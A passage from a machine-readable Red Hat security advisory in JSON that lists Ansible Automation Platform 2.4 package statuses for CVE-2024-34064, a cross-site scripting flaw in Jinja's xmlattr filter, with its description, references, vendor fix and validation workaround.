"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-jwcrypto: malicious JWE token can cause denial of service"
},
{
"cve": "CVE-2024-34064",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-05-07T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2279476"
}
],
"notes": [
{
"category": "description",
"text": "Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `\u003e`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. This vulnerability is fixed in 3.1.4.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jinja2: accepts keys containing non-attribute characters",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The fix for CVE-2024-22195 only addressed spaces, not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe.\n\nFence agents on RHEL 8 has been fixed as a part of https://access.redhat.com/errata/RHBA-2024:4238",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34064"
},
{
"category": "external",
"summary": "RHBZ#2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"
},
{
"category": "external",
"summary": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"
}
],
"release_date": "2024-05-06T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "workaround",
"details": "Do not accept user input as keys to the xmlattr filter without validation. See the statement above for more information.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
